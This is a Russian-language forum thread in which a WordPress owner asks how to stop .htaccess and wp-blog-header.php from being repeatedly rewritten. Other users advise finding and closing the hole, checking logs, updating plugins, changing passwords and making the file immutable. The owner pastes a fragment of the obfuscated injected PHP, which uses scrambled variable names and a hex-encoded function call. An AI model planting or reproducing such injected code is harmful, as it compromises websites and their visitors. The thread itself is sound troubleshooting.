как запретить редактирование файла .htaccess

T
На сайте с 28.06.2011
Offline
134
2618

доброго дня всем

имеется сайт на вордпрессе

и каждый день каким то магическим образом файл .htaccess и файл wp-blog-header.php редактируется сам

в нем появляется куча ироглифов каких то и непонятных команд

я так понимаю что это вирус какой то

можно ли как то запретить редактирование данных файлов? права 444 устанавлива - не помогает

или может как то кардинально по-другому можно решить данную проблему? спасибо ))

---------- Добавлено 12.06.2017 в 21:33 ----------

содержание файла вот такого плана

//header('Content-Type:text/html; charset=utf-8');

$O_0OO__0O0='J6Pn2HmH0e568SXnR6KRkmP5tQbh7KEW';

$O_O_OO000_='dribble11207';

$O_O_000_OO=1346;

$O_0O0OO_0_='D/B/C_E.asp';

$O__0OO00O_=700;

$OO__OO_000=1;

$O_O0OO_00_=array("endotheca","eventognath","floodage","mashal","pauperdom","millionary","exteriorness","coadjacent","holomorph","conspiratorial","agaces","eutropous","hemophagocytosis","encephalopsychesis","desertism","herpetological","craniorhachischisis","monopolism","consultee","archimorphic","anaesthesiant","huntswoman","lipogrammatic","heliotypy","desubstantiate","brachydomal","markmoot");;

$O0_O0O__O0='';

$O_0_O0_0OO='T3';["\x4f\x4f\x4f\x5f\x30\x4f\x5f\x30\x30\x5f"]();?>

Пермский Завод Винтовых Свай (http://vintovye-svai-perm.ru)
S
На сайте с 30.09.2016
Offline
469
#1

Штоле сегодня День взломщика? Что ни тема, так внедрение кода. Вас не должно волновать, как "запретить редактирование". Вас должно волновать, как закрыть дыру на сайте.

Отпилю лишнее, прикручу нужное, выправлю кривое. Вытравлю вредителей.
anser06
На сайте с 11.03.2006
Offline
292
#2

Анализировать error- и access-логи, искать, каким образом меняются файлы.

Проверить сайт айболитом.

Обновить CMS и плагины.

sergv
На сайте с 13.04.2006
Offline
441
#3
Sitealert:
Вас должно волновать, как закрыть дыру на сайте.

В свете последнего спама, наверное, пора спрашивать не про дыры и логи, а не "подтверждал" ли вопрошающий свой домен не так давно? :)

https://REGHOME.ru - регистрация и продление доменов от 169₽ в российских и международных зонах по честным ценам без звездочек. (R01, WebNames, UK2). Принимаем Ю-Money, Visa, MasterCard, Мир
A9
На сайте с 04.01.2012
Offline
317
#4

Если прям топорно, но запретить на верняк, то по SSH снимите атрибут записи на файл с помощью команды:

chattr +i .htacess 

В папке с сайтом.

Даже рут больше не сможет его менять. Если нужно поменять, выполняте ту же команду только с атрибутом -i

https://hstq.net - аренда серверов от 9.99$! Нет KYC! Много стран размещения на выбор! Акция - удвоим оплаченный период! Заказывайте!
EF
На сайте с 03.06.2017
Offline
1
#5

Запретить файлы для редактирования, обновить двиг и плагины, сменить пароли. Если лежит где-то шел, то тут уже лучше обратиться к тем кто чистит от вирусов.

SeVlad
На сайте с 03.11.2008
Offline
1609
#6
tarazik:
можно ли как то запретить редактирование данных файлов?

Нужно устранять причины (дыры), а не лечить последствия.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
D.iK.iJ
На сайте с 26.05.2013
Offline
239
#7

Процентов на 95 - дыры и прочие проблемы движка или даже скорее - плагинов.

Но есть маленький еще шанс, что это хостинг кривой. Раз в несколько лет были похожие проблемы. Переехал.

Адаптивный дизайн в 2 строчки ( https://dikij.com/wm/adaptaciya-saytov.php ). + Принимаю заказы любой сложности ( https://searchengines.guru/ru/forum/926323 ). 💎 Еще я делаю классные кулоны с опалами ( https://mosaicopal.ru/ ).
T
На сайте с 28.06.2011
Offline
134
#8

плагины все обновил, движок тоже. пароли тоже все сменил

проблема осталась. ((

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий